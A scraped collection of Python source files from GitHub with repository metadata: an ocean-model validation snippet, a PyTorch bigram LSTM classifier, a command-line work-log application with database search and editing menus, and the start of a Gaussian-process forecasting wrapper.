    ctd_comp = {'temp':temp_comp, 'salinity':sal_comp, 'dates':dates_comp, 'max_depth':max_obs_depth}
    # Surface buoy comparison: match each observation to the closest model time.
    observations = get_buoy_obs(obs_meta_data)
    if observations:
        buoy_temp_comp = []
        buoy_sal_comp = []
        buoy_dates_comp = []
        for this_ind, this_obs_time in enumerate(observations['time']):
            if this_obs_time >= model_time_mm[0] and this_obs_time <= model_time_mm[1]:
                this_time_close = fvcom_data_reader.closest_time(this_obs_time)
                # Surface values only (index 0 in the vertical).
                buoy_temp_comp.append([observations['temp'][this_ind], fvcom_data_reader.data.temp[this_time_close,0]])
                buoy_sal_comp.append([observations['salinity'][this_ind], fvcom_data_reader.data.salinity[this_time_close,0]])
                buoy_dates_comp.append([this_obs_time, this_time_close])
        buoy_comp = {'temp':buoy_temp_comp, 'salinity':buoy_sal_comp, 'dates':buoy_dates_comp}
    else:
        buoy_comp = {}
    return ctd_comp, buoy_comp
| li12242/PyFVCOM | PyFVCOM/validation.py | validation.py | py | 40,160 | python | en | code | null | github-code | 1 | [
{
"api_name": "datetime.datetime",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 176,
"usage_type": "call"
},
{
"api_name": "numpy.inf",
... |
25056244488 | import argparse
import time
import re
import os
import datetime
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import ReduceLROnPlateau
from torch.utils.data import Dataset, DataLoader, random_split
from torch.nn.utils.rnn import pack_padded_sequence, pad_sequence
from vocab import Vocab
class Merger(nn.Module):
    """
    Binary classifier over character bigrams, backed by a character-level
    bidirectional LSTM encoder.
    """
    def __init__(self, args, vocab):
        super().__init__()
        # Two output classes (output_vocab_size=2): merge / don't merge.
        self.bigram_encoder = Merger.BigramCharRNN(
            args,
            output_vocab_size=2,
            input_vocab=vocab.src.char2id)

    def forward(self, bigrams, lengths_bigram):
        # bigrams: padded character-index tensor; lengths_bigram: the
        # original (unpadded) sequence lengths used for packing.
        outputs_bigram = self.bigram_encoder(bigrams, lengths_bigram)
        return outputs_bigram

    class BigramCharRNN(nn.Module):
        """ Character-level BiLSTM encoder with a two-layer classification head. """
        def __init__(self,
                     args,
                     output_vocab_size,
                     input_vocab):
            super().__init__()
            self.input_vocab = input_vocab
            self.hidden_dim = args.rnn_dim_char
            self.num_layers = args.rnn_layers
            self.word_embeddings = nn.Embedding(len(input_vocab), args.ce_dim)
            self.lstm = nn.LSTM(args.ce_dim,
                                args.rnn_dim_char,
                                num_layers=args.rnn_layers,
                                bidirectional=True)
            # Classification head: summed hidden state -> 64 -> output classes.
            self.fc0 = nn.Linear(args.rnn_dim_char, 64)
            self.fc1 = nn.Linear(64, output_vocab_size)
            self.relu = nn.ReLU()
            self.dropout = nn.Dropout(0.1)

        def forward(self, bigrams, lengths):
            embeds = self.dropout(self.word_embeddings(bigrams))
            # Pack so the LSTM skips padded positions.
            packed_embeds = pack_padded_sequence(
                embeds, lengths, enforce_sorted=False)
            _, hidden = self.lstm(packed_embeds)
            # NOTE(review): `hidden` is the (h_n, c_n) tuple, so this sums
            # hidden states AND cell states together; for a bidirectional
            # LSTM h_n/c_n have num_layers * 2 entries of which only the
            # first num_layers are included. Both look unintentional --
            # confirm against training results before changing.
            hidden = sum(hidden[i][j, :, :]
                         for i in range(2) for j in range(self.num_layers))
            tag_space = self.relu(self.fc0(hidden))
            tag_space = self.fc1(tag_space)
            return tag_space
class Network:
def __init__(self, args) -> None:
    """ Build the device, vocab, data iterators, model, loss, optimiser and LR scheduler from parsed CLI args. """
    # Use the requested GPU when CUDA is available, otherwise fall back to CPU.
    self.device = torch.device(
        f'cuda:{args.gpu_index}' if torch.cuda.is_available() else 'cpu')
    self.vocab = Vocab.load(args.vocab_path)
    self.load_data(args)
    self.model = Merger(args, vocab=self.vocab).to(self.device)
    self.loss_function = nn.CrossEntropyLoss()
    self.optimizer = optim.Adam(self.model.parameters())
    # Reduce the learning rate when the monitored loss stops decreasing
    # for 3 consecutive epochs.
    self.scheduler = ReduceLROnPlateau(self.optimizer, 'min', patience=3)
class BigramData(Dataset):
    """ Thin Dataset wrapper over a sequence of (source-indices, label) pairs. """
    def __init__(self, data) -> None:
        self.data = data

    def __getitem__(self, index):
        pair = self.data[index]
        return (torch.tensor(pair[0], dtype=torch.long),
                torch.tensor(pair[1], dtype=torch.long))

    def __len__(self):
        return len(self.data)
def load_data(self, args, train_split=0.8):
with open(args.data) as f:
data = [line.split('\t') for line in f.readlines()]
src = self.vocab.src.words2indices([list(line[0].strip()) for line in data])
labels = [0 if bigram[1].strip() == '0' else 1 for bigram in data]
src, labels = src[:args.data_size], labels[:args.data_size]
data = list(zip(src, labels))
lengths = [int(len(src)*train_split), int(len(src)*(1-train_split))]
if sum(lengths) != len(src):
lengths[0] += len(src) - sum(lengths)
train_data, dev_data = random_split(data, lengths)
train_data = Network.BigramData(train_data)
dev_data = Network.BigramData(dev_data)
def generate_batch(data_batch):
src_batch, labels_batch = [], []
lengths_bigram = []
for src_item, label_item in data_batch:
lengths_bigram.append(len(src_item))
src_batch.append(src_item)
labels_batch.append(label_item)
src_batch = pad_sequence(
src_batch, padding_value=self.vocab.src.word2id['<pad>'])
labels_batch = torch.stack(labels_batch)
return (src_batch, labels_batch), lengths_bigram
self.train_iter = DataLoader(train_data, batch_size=args.batch_size,
shuffle=True, collate_fn=generate_batch)
self.dev_iter = DataLoader(train_data, batch_size=args.batch_size,
collate_fn=generate_batch)
@staticmethod
def epoch_time(start_time: int,
end_time: int):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
def train(self, args):
metrics = {'train_loss': [], 'dev_loss': [], 'dev_acc': []}
for epoch in range(args.epochs):
self.model.train()
print(f'Epoch {epoch+1}/{args.epochs}')
epoch_loss = 0
start_time = time.time()
for iteration, train_batch in enumerate(self.train_iter):
(bigrams, labels), lengths = train_batch
self.model.zero_grad()
bigrams, labels = bigrams.to(self.device), labels.to(self.device)
tag_scores = self.model(bigrams, lengths)
tag_scores = tag_scores.view(-1, tag_scores.shape[-1])
labels = labels.view(-1)
loss = self.loss_function(tag_scores, labels)
loss.backward()
self.optimizer.step()
epoch_loss += loss.item()
if iteration and iteration % 100 == 0 and len(self.train_iter) - iteration > 10 \
or iteration + 1 == len(self.train_iter):
for param_group in self.optimizer.param_groups:
lr = param_group['lr']
print(
f'Batch {iteration}/{len(self.train_iter)-1}\t| Loss {loss.item():.7f} | lr {lr}')
metrics['train_loss'].append(epoch_loss / iteration)
end_time = time.time()
epoch_mins, epoch_secs = Network.epoch_time(start_time, end_time)
val_metrics = self.evaluate()
for m in metrics:
if m != 'train_loss':
metrics[m].append(val_metrics[m])
print(
f'Epoch {epoch+1}/{args.epochs} | Time: {epoch_mins}m {epoch_secs}s')
print(
f"\tTrain Loss: {metrics['train_loss'][-1]:.7f} | Dev. Loss: {metrics['dev_loss'][-1]:.7f} | Dev. Acc.: {metrics['dev_acc'][-1]:.1%}")
print()
self.scheduler.step(metrics['dev_loss'][-1])
self.save_model(args)
return metrics
def evaluate(self):
self.model.eval()
with torch.no_grad():
correct, total = 0, 0
epoch_loss = 0
for (bigrams, labels), lengths in self.dev_iter:
# Loss
bigrams, labels = bigrams.to(self.device), labels.to(self.device)
output = self.model(bigrams, lengths)
loss = self.loss_function(output, labels)
epoch_loss += loss.item()
# Accuracy
output = output.argmax(-1)
correct += torch.sum(output == labels)
total += labels.shape[0]
metrics = {}
metrics['dev_acc'] = correct / total
metrics['dev_loss'] = epoch_loss / len(self.dev_iter)
return metrics
def predict(self):
self.model.eval()
pred, gold = [], []
inputs_bigram = []
with torch.no_grad():
for (bigrams, labels), lengths in self.dev_iter:
bigrams, labels = bigrams.to(self.device), labels.to(self.device)
output = self.model(bigrams, lengths)
output = output.argmax(-1)
pred += list(output.detach().cpu().numpy())
gold += list(labels.detach().cpu().numpy())
inputs_bigram += list(bigrams.permute(1, 0).detach().cpu().numpy())
return inputs_bigram, gold, pred
@staticmethod
def load_model(model_path: str):
params = torch.load(model_path)
args = params['args']
network = Network(args)
network.model.load_state_dict(params['state_dict'])
return network
def save_model(self, args):
save_path = os.path.join(args.cpt, args.logdir) + '.pt'
print('Saving model parameters to [%s]\n' % save_path)
params = {
'args': args,
'state_dict': self.model.state_dict()
}
torch.save(params, save_path)
def main():
    """Parse arguments, then either train a new model or load a checkpoint
    and dump dev-set predictions to a log file."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--batch_size", default=1048,
                        type=int, help="Batch size.")
    parser.add_argument("--epochs", default=50, type=int,
                        help="Number of epochs.")
    parser.add_argument("--ce_dim", default=32, type=int,
                        help="Word embedding dimension.")
    parser.add_argument("--we_dim", default=64, type=int,
                        help="Word embedding dimension.")
    parser.add_argument("--rnn_dim_char", default=64,
                        type=int, help="RNN cell dimension.")
    parser.add_argument("--rnn_dim", default=128,
                        type=int, help="RNN cell dimension.")
    parser.add_argument("--rnn_layers", default=1,
                        type=int, help="Number of RNN layers.")
    parser.add_argument("--data_size", default=10000, type=int,
                        help="Maximum number of examples to load.")
    parser.add_argument("--gpu_index", default=0, type=int,
                        help="Index of GPU to be used.")
    parser.add_argument("--vocab", dest='vocab_path',
                        default="/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/data_nn_vocab.json", type=str,
                        help="Path to vocab JSON file.")
    parser.add_argument("--data",
                        default="/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/data_nn.tsv", type=str,
                        help="Path to file with bigrams dataset.")
    parser.add_argument("--cpt", default='/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/model_weights', type=str,
                        help="Directory to save the model checkpoints to.")
    parser.add_argument("--logs", default='/Users/chriscay/Library/Mobile Documents/com~apple~CloudDocs/NYUAD/camel_morph/sandbox_files/root_generator/logs', type=str,
                        help="Directory to save the model checkpoints to.")
    parser.add_argument("--load", default='', type=str,
                        help="Directory to save the model checkpoints to.")
    parser.add_argument("--seed", default=42, type=int, help="Random seed.")
    # In a notebook (__file__ undefined) fall back to the defaults.
    args = parser.parse_args([] if "__file__" not in globals() else None)
    torch.manual_seed(args.seed)
    np.random.seed(args.seed)
    # Log/checkpoint name: script stem, timestamp, abbreviated int options.
    args.logdir = "{}-{}-{}".format(
        os.path.basename(globals().get("__file__", "notebook").split('.')[0]),
        datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"),
        ",".join(("{}={}".format(re.sub(
            "(.)[^_]*_?", r"\1", key), value) for key, value in sorted(vars(args).items()) if isinstance(value, int)))
    )
    if not args.load:
        network = Network(args)
        metrics = network.train(args)
        print(metrics)
    else:
        # BUG FIX: the checkpoint loader is `Network.load_model`; the file
        # defines no `Network.load`.
        network = Network.load_model(args.load)
        inputs, gold, pred = network.predict()
        with open(os.path.join(args.logs, args.logdir), 'w') as f:
            for i, result in enumerate(pred):
                # BUG FIX: map the i-th input sequence (`inputs[i]`), not a
                # single char id from the first sequence (`inputs[0][i]`).
                bigram = ''.join(
                    list(map(lambda x: network.vocab.src.id2char[x], inputs[i])))
                print(re.sub(r'(<pad>)+?', r'', bigram), file=f, end=' | ')
                print(result, 'gold:', gold[i], file=f, end= ' | ')


if __name__ == '__main__':
    main()
| CAMeL-Lab/camel_morph | camel_morph/sandbox/merger_network.py | merger_network.py | py | 12,300 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "vocab.src",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"l... |
38924106495 | #!/usr/bin/env python3
"""Work Log
Record work activities and store to a sqlite database
Created: 2018
Last Update: 2018-06-05
Author: Alex Koumparos
"""
import datetime
import re
# from csv_manager import CsvManager
from db_manager import DBManager
import wl_settings as settings
class Menu:
    """The user-facing class that handles all interaction with the user and
    interfaces with the database manager.
    """
    # STATUS VARIABLES
    # ----------------
    # Set to True by quit_program() to stop the menu state machine.
    quit = False
    # INITIALIZER
    # -----------
    def __init__(self, load_menu=True):
        """Instantiates the app, applies default settings and launches the
        main menu.

        Pass load_menu=False to build the object without entering the
        interactive loop (useful for testing).
        """
        print("\nWORK LOG")
        print("========")
        # User-tweakable settings; options() mutates 'date format'.
        self.OPTIONS = {
            'date format': settings.DATE_FORMATS['iso 8601'],
            'save format (date)': settings.DATE_FORMATS['iso 8601'],
            'case sensitive search': False,
            'entries per page': 10,
            'allow future dates': False,
            'earliest allowed date': datetime.datetime(1900, 1, 1),
        }
        self.current_record = 0
        self.current_page_start = 0
        # Each menu handler returns the next handler; run the state machine
        # until quit_program() flips self.quit.
        if load_menu:
            menu = self.main_menu()
            while not self.quit:
                menu = menu()
# MENU METHODS
# ------------
def main_menu(self):
"""This is the root menu. The user selects which activity to perform
and then the method returns the function for the activity.
"""
inputs = {
'a': {'text': 'Add new entry',
'function': self.add_entry},
's': {'text': 'Search in existing entries',
'function': self.search_entries},
'o': {'text': 'Options',
'function': self.options},
'q': {'text': 'Quit program',
'function': self.quit_program}
}
while True:
print("\nMAIN MENU")
print("What would you like to do?")
for key, value in inputs.items():
print("{}) {}".format(key, value['text']))
user_entry = input("> ").lower()
print(user_entry)
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
def add_entry(self):
"""This is the menu where the user can add a task that was completed
"""
while True:
print("\nADD ENTRY")
print("Username")
input_text = input("Enter your name > ")
username = input_text
date = None
while date is None:
print("Date of the Task")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
date = user_entry[1]
date_string = self.date_to_string(date, target='file')
print("Name of the Task")
input_text = input("Enter the name of the task > ")
task_name = input_text
time_spent = None
while time_spent is None:
print("Time spent")
print("Enter a whole number of minutes (rounded)")
input_text = input("> ")
try:
time_spent = int(input_text)
except ValueError:
print("Invalid value, please try again")
continue
if time_spent < 0:
print("Invalid value, please try again")
continue
print("Notes")
input_text = input("(Optional, leave blank for none) ")
notes = input_text
# call method to write data to file
dbm = DBManager()
file_data = {
settings.HEADERS['user']: username,
settings.HEADERS['date']: date_string,
settings.HEADERS['task_name']: task_name,
settings.HEADERS['duration']: time_spent,
settings.HEADERS['notes']: notes
}
dbm.add_entry(file_data)
return self.main_menu
    def options(self):
        """This is the menu where the user can specify user-configurable
        options
        """
        print('OPTIONS')
        print("Choose a display date format")
        menu_choices = list(settings.DATE_FORMATS.keys())
        menu_size = len(menu_choices)
        for i in range(len(menu_choices)):
            print("({}) - {}".format(i + 1, menu_choices[i]))
        input_text = input("> ")
        # Accept only a 1-based number within the listed range; anything
        # else falls through to the main menu with settings unchanged.
        if input_text in [str(x) for x in range(1, menu_size + 1)]:
            choice = int(input_text) - 1
            choice = menu_choices[choice]
            print("You chose: {}".format(choice))
            self.OPTIONS['date format'] = settings.DATE_FORMATS[choice]
            print('going back to main menu')
        else:
            print("Invalid entry, returning to main menu")
        return self.main_menu
def search_entries(self):
"""This is the search menu. The user selects how they want to search.
"""
inputs = {
'l': {'text': 'employee names List',
'function': self.search_employee},
'e': {'text': 'Employee name Search',
'function': self.search_employee_text},
'd': {'text': 'single Date',
'function': self.search_exact_date},
'r': {'text': 'date Range',
'function': self.search_date_range},
't': {'text': 'Time spent',
'function': self.search_time_spent},
's': {'text': 'text Search',
'function': self.search_text_search},
'b': {'text': 'Back to main menu',
'function': self.main_menu}
}
while True:
print("\nSEARCH ENTRIES")
print("How would you like to search?")
for key, value in inputs.items():
print("{}) {}".format(key, value['text']))
user_entry = input("> ").lower()
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
def quit_program(self):
print("Quitting")
self.quit = True
def present_results(self):
"""Show all the results from the search and then provide interaction
choices
"""
inputs = {
'n': {'text': 'Next page',
'function': self.next_page},
'p': {'text': 'Previous page',
'function': self.previous_page},
'v': {'text': 'View detail',
'function': self.select_detail},
'e': {'text': 'Edit',
'function': self.edit_record},
'd': {'text': 'Delete',
'function': self.delete_record},
'm': {'text': 'go back to Main menu',
'function': self.main_menu},
'q': {'text': 'quit',
'function': self.quit_program},
}
if self.current_page_start == 0:
del(inputs['p'])
next_start = self.current_page_start + self.OPTIONS['entries per page']
if next_start >= len(self.records):
del(inputs['n'])
print("\nSearch Results")
if len(self.records) > next_start:
current_page_end = next_start
else:
current_page_end = len(self.records) - 1
for index in range(self.current_page_start, current_page_end + 1):
value = self.records[index]
short_form = self.display_entry(value, return_only=True)
print("{}) {}".format(index + 1, short_form))
print("\nAvailable actions:")
for key, value in inputs.items():
print('{}) {}'.format(key, value['text']))
while True:
user_entry = input("> ").lower()
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
    def present_next_result(self):
        """Show the record at ``current_record`` in full detail and prompt
        for the next action; returns the chosen handler.
        """
        inputs = {
            'p': {'text': 'Previous',
                  'function': self.previous_result},
            'n': {'text': 'Next',
                  'function': self.next_result},
            'b': {'text': 'Back to list view',
                  'function': self.present_results},
            'e': {'text': 'Edit',
                  'function': self.edit_current_record},
            'd': {'text': 'Delete',
                  'function': self.delete_current_record},
            'm': {'text': 'go back to Main menu',
                  'function': self.main_menu},
            'q': {'text': 'quit',
                  'function': self.quit_program},
        }
        # Hide navigation that would step off either end of the results.
        if self.current_record == 0:
            del(inputs['p'])
        if self.current_record == len(self.records) - 1:
            del(inputs['n'])
        record = self.records[self.current_record]
        self.display_entry(record, verbose=True)
        print("\nAvailable actions:")
        for key, value in inputs.items():
            print('{}) {}'.format(key, value['text']))
        while True:
            user_entry = input("> ").lower()
            if user_entry not in inputs.keys():
                continue
            return inputs[user_entry]['function']
# Specific Search Menus
# .....................
    def search_employee(self):
        """This is the menu where the user is given a list of all employees
        who have entries, and can select a particular employee to see
        all their entries
        """
        print("\nSEARCH BY EMPLOYEE")
        # load the db manager
        dbm = DBManager()
        employee_names = dbm.view_employees()
        for i, value in enumerate(employee_names):
            print("{}) {}".format(i + 1, value['name']))
        selected_employee = None
        while selected_employee is None:
            user_input = input("> ")
            # perform input validation (menu is 1-based, list is 0-based)
            try:
                user_input = int(user_input) - 1
            except ValueError:
                print("Invalid value, try again")
                continue
            if user_input < 0:
                print("Value out of range. Try again.")
                continue
            try:
                selected_employee = employee_names[user_input]['name']
            except IndexError:
                print("Value out of range. Try again.")
                continue
        # when an employee is selected, show all the entries with that e'ee
        matching_records = dbm.view_everything(employee=selected_employee)
        self.records = matching_records
        self.current_record = 0
        return self.present_next_result
    def search_employee_text(self):
        """This is the menu where the user enters a text string and is presented
        with all employee names containing that string
        """
        print('FIND EMPLOYEE NAME USING TEXT STRING')
        print("Enter the text string to search on")
        input_text = input("> ")
        text_string = input_text
        # load db
        dbm = DBManager()
        # List only employees whose name contains the search string.
        employee_names = dbm.view_names_with_text(text_string)
        for i, value in enumerate(employee_names):
            print("{}) {}".format(i + 1, value['name']))
        selected_employee = None
        while selected_employee is None:
            user_input = input("> ")
            # perform input validation (menu is 1-based, list is 0-based)
            try:
                user_input = int(user_input) - 1
            except ValueError:
                print("Invalid value, try again")
                continue
            if user_input < 0:
                print("Value out of range. Try again.")
                continue
            try:
                selected_employee = employee_names[user_input]['name']
            except IndexError:
                print("Value out of range. Try again.")
                continue
        # when an employee is selected, show all the entries with that e'ee
        matching_records = dbm.view_everything(employee=selected_employee)
        self.records = matching_records
        self.current_record = 0
        return self.present_next_result
    def search_exact_date(self):
        """This is the menu where the user browses dates and entries and picks
        the date from a list
        """
        print("\nSEARCH EXACT DATE")
        # load the db manager
        dbm = DBManager()
        date_records = dbm.view_dates()
        # Show each stored date in the user's preferred display format.
        for i, value in enumerate(date_records):
            value = self.date_to_string(value['date'])
            print("{}) {}".format(i + 1, value))
        selected_date = None
        while selected_date is None:
            user_input = input("> ")
            # perform input validation (menu is 1-based, list is 0-based)
            try:
                user_input = int(user_input) - 1
            except ValueError:
                print("Invalid value, try again")
                continue
            if user_input < 0:
                print("Value out of range. Try again.")
                continue
            try:
                selected_date = date_records[user_input]['date']
            except IndexError:
                print("Value out of range. Try again.")
                continue
        # when a date is selected, show all the entries with that date
        matching_records = dbm.view_entries_for_date(selected_date)
        self.records = matching_records
        self.current_record = 0
        return self.present_next_result
def search_date_range(self):
"""This is the menu where the user can enter a from date and to date
and get back every entry from within that range
"""
print('SEARCH DATE RANGE')
start_date = None
end_date = None
# get start_date
while start_date is None:
print("Start Date:")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
start_date = user_entry[1]
# get end_date
while end_date is None:
print("End Date:")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
end_date = user_entry[1]
# load db
dbm = DBManager()
# switch start and end dates if end < start
if end_date < start_date:
current_date = end_date
end_date = start_date
start_date = end_date
else:
current_date = start_date
# get all records in date range
matching_records = dbm.view_entries_for_date_range(start_date,
end_date)
print("\nShowing entries:")
if len(matching_records) == 0:
print("\nNo matches, returning to search menu")
return self.search_entries
self.records = matching_records
self.current_record = 0
return self.present_next_result
    def search_time_spent(self):
        """This is the menu where the user enters the number of minutes a task
        took and be able to choose one to see entries from
        """
        print('SEARCH BY TIME SPENT')
        print("Time spent")
        time_spent = None
        # Re-prompt until the user supplies a parseable integer.
        while time_spent is None:
            input_text = input("Enter a whole number of minutes (rounded) ")
            try:
                time_spent = int(input_text)
            except ValueError:
                print("Invalid value")
                continue
        # load db
        dbm = DBManager()
        matching_records = dbm.view_entries_for_duration(time_spent)
        if len(matching_records) == 0:
            print("\nNo matches, returning to search menu")
            return self.search_entries
        self.records = matching_records
        self.current_record = 0
        return self.present_next_result
    def search_text_search(self):
        """This is the menu where the user enters a text string and is presented
        with all entries containing that string in the task name or notes
        """
        print('SEARCH USING TEXT STRING')
        print("Enter the text string to search on")
        input_text = input("> ")
        text_string = input_text
        # load db
        dbm = DBManager()
        matching_records = dbm.view_entries_with_text(text_string)
        if len(matching_records) == 0:
            print("\nNo matches, returning to search menu")
            return self.search_entries
        # Hand the matches to the single-record detail view.
        self.records = matching_records
        self.current_record = 0
        return self.present_next_result
# Modification Methods
# --------------------
    def edit_record(self):
        """Prompt for a result number, collect replacement values for every
        field, and write them through the database manager.
        """
        print("edit record")
        print('enter the record number to edit')
        user_input = input("> ")
        # NOTE(review): unlike the search menus, this int() is unguarded —
        # non-numeric input raises ValueError instead of re-prompting.
        match_index = int(user_input) - 1
        record = self.records[match_index]
        # get the new values for the record
        print("New Username")
        input_text = input("Enter the username > ")
        username = input_text
        date = None
        while date is None:
            print("New date of the Task")
            user_entry = self.date_entry()
            if user_entry[0] is not None:  # error
                print(user_entry[0])
                continue
            else:
                date = user_entry[1]
        # Dates are persisted in the configured save format.
        date_string = self.date_to_string(date, target='file')
        print("New name of the Task")
        input_text = input("Enter the name of the task > ")
        task_name = input_text
        time_spent = None
        while time_spent is None:
            print("New time spent")
            input_text = input("Enter a whole number of minutes (rounded) ")
            try:
                time_spent = int(input_text)
            except ValueError:
                print("Invalid value")
                continue
        print("New notes")
        input_text = input("(Optional, leave blank for none) ")
        notes = input_text
        # load the db
        dbm = DBManager()
        # old_entry = dbm.view_entries
        new_values = {
            'name': username,
            'date': date_string,
            'task_name': task_name,
            'duration': time_spent,
            'notes': notes
        }
        dbm.edit_entry(record, new_values)
        return self.main_menu
def edit_current_record(self):
print("edit record")
match_index = self.current_record
record = self.records[match_index]
# get the new values for the record
print("New Username")
input_text = input("Enter the username > ")
username = input_text
date = None
while date is None:
print("New date of the Task")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
date = user_entry[1]
print("New name of the Task")
input_text = input("Enter the name of the task > ")
task_name = input_text
time_spent = None
while time_spent is None:
print("New time spent")
input_text = input("Enter a whole number of minutes (rounded) ")
try:
time_spent = int(input_text)
except ValueError:
print("Invalid value")
continue
print("New notes")
input_text = input("(Optional, leave blank for none) ")
notes = input_text
# load the db
dbm = DBManager()
new_values = {
'name': username,
'date': date,
'task_name': task_name,
'duration': time_spent,
'notes': notes
}
dbm.edit_entry(record, new_values)
return self.main_menu
def select_detail(self):
print("View record")
print('enter the record number to view')
user_input = input("> ")
match_index = int(user_input) - 1
self.current_record = match_index
return self.present_next_result
    def delete_record(self):
        """Prompt for a result number and delete that record from the db."""
        print("delete record")
        print('enter the record number to delete')
        user_input = input("> ")
        # NOTE(review): int() is unguarded here — non-numeric input raises
        # ValueError rather than re-prompting.
        match_index = int(user_input) - 1
        record = self.records[match_index]
        print(record)
        # load db
        dbm = DBManager()
        dbm.delete_entry(record)
        print("Entry deleted")
        return self.main_menu
def delete_current_record(self):
print("delete record")
match_index = self.current_record
record = self.records[match_index]
# load db
dbm = DBManager()
dbm.delete_entry(record)
print("Entry deleted")
return self.main_menu
# Other UI Methods
# ----------------
def display_entry(self, entry, verbose=False, return_only=False):
"""This method displays a selected entry, showing:
- date (read from file in iso 8601 and displayed in whatever is set in
options)
- task name
- time taken
- any notes
"""
username = entry[settings.HEADERS['user']]
date_object = entry[settings.HEADERS['date']]
date = self.date_to_string(date_object, target="display")
task_name = entry[settings.HEADERS['task_name']]
time_taken = entry[settings.HEADERS['duration']]
notes = entry[settings.HEADERS['notes']]
if verbose:
line0 = username
print(line0)
line1 = "{}: {}".format(date, task_name)
print(line1)
print("-" * len(line1))
print("{} minutes".format(time_taken))
print("{}".format(notes))
else:
short_form = "{}: {} ({}m): {} | {}".format(username,
date,
time_taken,
task_name,
notes)
if return_only:
return short_form
else:
print(short_form)
def previous_result(self):
"""load previous result"""
self.current_record -= 1
return self.present_next_result
def next_result(self):
"""load next result"""
self.current_record += 1
return self.present_next_result
def previous_page(self):
"""load previous page of results"""
self.current_page_start -= self.OPTIONS['entries per page']
return self.present_results
def next_page(self):
"""load next page of results"""
self.current_page_start += self.OPTIONS['entries per page']
return self.present_results
# Helper Methods
# --------------
def validate_date_entry(self, date_string, date_format):
"""Takes a date_string and date_format and attempts to create
a valid datetime object with those imports.
Returns a tuple in the form (error, datetime) where:
- `error` is None if valid and a description of the error text if
invalid;
- `datetime` is a datetime object if valid and None if invalid
"""
try:
naive_datetime = datetime.datetime.strptime(
date_string,
date_format['datetime format']
)
except ValueError:
error_text = "{date_string} is not valid in format {date_format}"
error_args = {"date_string": date_string,
"date_format": date_format['UI format']}
return (error_text.format(**error_args), None)
else:
if not self.OPTIONS['allow future dates']:
if naive_datetime > datetime.datetime.now():
error_text = "dates in the future are not permitted"
error_args = {"date_string": date_string,
"date_format": date_format['UI format']}
return (error_text.format(**error_args), None)
if naive_datetime < self.OPTIONS['earliest allowed date']:
bad_date = self.OPTIONS['earliest allowed date'].strftime(
self.OPTIONS['date format']['datetime format']
)
error_text = "dates before {} are not permitted".format(
bad_date
)
error_args = {"date_string": date_string,
"date_format": date_format['UI format']}
return (error_text.format(**error_args), None)
return (None, naive_datetime)
def date_entry(self):
"""This helper function asks for a date input in the user's preferred
format and then returns that date as a naive datetime object
"""
date_format = self.OPTIONS['date format']
input_text = "Please use the '{}' date format: "
user_entry = input(input_text.format(date_format['UI format']))
# validate date entry
validated = self.validate_date_entry(user_entry, date_format)
return validated
def date_to_string(self, date_object, target='display'):
"""This helper function takes a naive date object and returns a
string representation in:
- `target='display'`: the user's preferred display format
- `target='file': the save format
"""
if target == 'display':
option = self.OPTIONS['date format']
string_format = option['datetime format']
else: # 'file' or unrecognised target, fallback to write mode
option = self.OPTIONS['save format (date)']
string_format = option['datetime format']
return date_object.strftime(string_format)
# ---------------------------
if __name__ == "__main__":
    # Constructing Menu with the default load_menu=True starts the
    # interactive main loop immediately.
    menu = Menu()
| Crossroadsman/treehouse-techdegree-python-project4 | work_log.py | work_log.py | py | 26,340 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "wl_settings.DATE_FORMATS",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "wl_settings.DATE_FORMATS",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime",
"line_number": 40,
"usage_type": "call"
},
{
"api... |
23199437019 | import math
import torch
import gpytorch
import numpy as np
from voltron.means import EWMAMean, DEWMAMean, TEWMAMean
from botorch.models import SingleTaskGP
from botorch.optim.fit import fit_gpytorch_torch
from voltron.rollout_utils import nonvol_rollouts
class BasicGP():
    """Convenience wrapper around a botorch ``SingleTaskGP``.

    Builds mean and covariance modules from string options, then exposes
    ``Train`` (hyperparameter fitting) and ``Forecast`` (posterior
    sampling) helpers.
    """

    def __init__(self, train_x, train_y, kernel="matern", mean='constant',
                 k=400, num_mixtures=10):
        """Construct the GP.

        kernel: 'matern', 'rbf', or a spectral-mixture alias
        ('sm'/'spectralmixture'/'spectral'); mean: 'constant', 'ewma',
        'dewma' or 'tewma' (the EWMA family needs the data and window k).
        Raises ValueError for an unrecognized kernel or mean.
        """
        if mean.lower() == 'constant':
            mean_module = gpytorch.means.ConstantMean().to(train_x.device)
        elif mean.lower() == 'ewma':
            mean_module = EWMAMean(train_x, train_y, k).to(train_x.device)
        elif mean.lower() == 'dewma':
            mean_module = DEWMAMean(train_x, train_y, k).to(train_x.device)
        elif mean.lower() == 'tewma':
            mean_module = TEWMAMean(train_x, train_y, k).to(train_x.device)
        else:
            # Fail fast: the old code printed "ERROR" and then crashed later
            # with NameError on the undefined mean_module.
            raise ValueError("Mean not implemented: {}".format(mean))

        if kernel.lower() == 'matern':
            covar_module = gpytorch.kernels.ScaleKernel(
